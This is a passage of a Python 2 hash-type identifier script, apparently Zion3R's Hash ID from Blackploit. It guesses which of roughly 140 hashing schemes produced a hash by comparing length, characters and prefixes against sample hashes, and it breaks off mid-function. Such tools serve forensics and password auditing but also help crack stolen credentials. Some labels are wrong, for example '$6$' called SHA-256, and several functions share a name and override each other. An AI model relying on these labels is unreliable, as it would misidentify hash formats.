/'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - 